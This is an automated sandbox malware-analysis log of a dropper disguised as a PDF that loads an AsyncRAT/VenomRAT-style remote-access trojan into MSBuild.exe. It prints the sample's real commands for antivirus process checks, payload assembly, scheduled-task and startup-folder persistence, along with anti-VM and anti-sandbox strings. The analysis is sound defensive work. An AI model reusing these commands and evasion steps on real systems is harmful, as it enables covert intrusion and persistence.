Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_18-107177

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1490000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4DF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 10D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 29E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: B40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2810000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 1550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 3470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\winservices.exe	Memory allocated: 1770000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\winservices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\winservices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\winservices.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif

Window / User API: threadDelayed 4674

Jump to behavior

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

API coverage: 4.1 %

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif TID: 7688	Thread sleep time: -46740s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\winservices.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\winservices.exe TID: 7752	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7508	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\winservices.exe TID: 8188	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif

Thread sleep count: Count: 4674 delay: -10

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AFA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	18_2_00AFA32C
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AEE334 GetFileAttributesW,FindFirstFileW,FindClose,	18_2_00AEE334
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF65AE FindFirstFileW,FindNextFileW,FindClose,	18_2_00AF65AE
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00ABC6C2 FindFirstFileExW,	18_2_00ABC6C2
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	18_2_00AF72A6
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF7205 FindFirstFileW,FindClose,	18_2_00AF7205
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AED7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00AED7CC
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AEDB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00AEDB0B
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_00AF9E43
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_00AF9F9E

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00A829A4 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

18_2_00A829A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\winservices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\winservices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\winservices.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\186040	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\186040\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AFF2E8 BlockInput,

18_2_00AFF2E8

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00A8331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_00A8331E

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AA5108 mov eax, dword ptr fs:[00000030h]

18_2_00AA5108

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AE20EE WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,

18_2_00AE20EE

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AB29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00AB29B2
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA0C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00AA0C5F
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA0DF5 SetUnhandledExceptionFilter,	18_2_00AA0DF5
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA1041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_00AA1041

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: winservices.exe.24.dr, NativeMethodsShared.cs	Reference to suspicious API methods: OpenProcess(eDesiredAccess.PROCESS_QUERY_INFORMATION, bInheritHandle: false, processIdTokill)
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, Outils.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, Outils.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D00000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 700000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D00000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC9000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 700000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000	Jump to behavior

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

18_2_00AE1A7B

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00A8331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_00A8331E

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AEBA4A SendInput,keybd_event,

18_2_00AEBA4A

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AEEB90 mouse_event,

18_2_00AEEB90

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 186040	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "toolkitczechhappenwestminster" Texture	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Junk + ..\Screenshot + ..\Colombia + ..\Escorts + ..\Waiver + ..\Aboriginal + ..\Wherever + ..\Higher + ..\Amazon + ..\Releases + ..\Dame + ..\Economic + ..\Innovations + ..\Sampling + ..\Nuke + ..\Fellowship + ..\Brain + ..\Eat + ..\Shopping + ..\Constitution + ..\Planes + ..\Railroad + ..\Enhancing + ..\Locator + ..\Occasion + ..\Pay + ..\Cinema L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif Tracks.pif L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8CF.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\winservices.exe "C:\Users\user\AppData\Roaming\winservices.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBB7A.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\winservices.exe "C:\Users\user\AppData\Roaming\winservices.exe"

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\junk + ..\screenshot + ..\colombia + ..\escorts + ..\waiver + ..\aboriginal + ..\wherever + ..\higher + ..\amazon + ..\releases + ..\dame + ..\economic + ..\innovations + ..\sampling + ..\nuke + ..\fellowship + ..\brain + ..\eat + ..\shopping + ..\constitution + ..\planes + ..\railroad + ..\enhancing + ..\locator + ..\occasion + ..\pay + ..\cinema l
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echocraft.url" & echo url="c:\users\user\appdata\local\echoartisan technologies\echocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echocraft.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\junk + ..\screenshot + ..\colombia + ..\escorts + ..\waiver + ..\aboriginal + ..\wherever + ..\higher + ..\amazon + ..\releases + ..\dame + ..\economic + ..\innovations + ..\sampling + ..\nuke + ..\fellowship + ..\brain + ..\eat + ..\shopping + ..\constitution + ..\planes + ..\railroad + ..\enhancing + ..\locator + ..\occasion + ..\pay + ..\cinema l	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echocraft.url" & echo url="c:\users\user\appdata\local\echoartisan technologies\echocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\echocraft.url" & exit	Jump to behavior

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AE13DC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

18_2_00AE13DC

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AE1EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

18_2_00AE1EDD

Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028C3000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000000.1735484987.0000000000213000.00000002.00000001.01000000.00000006.sdmp, Tracks.pif, 0000000A.00000003.1747620461.0000000003E94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: EchoCraft.scr, MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: ProgMan
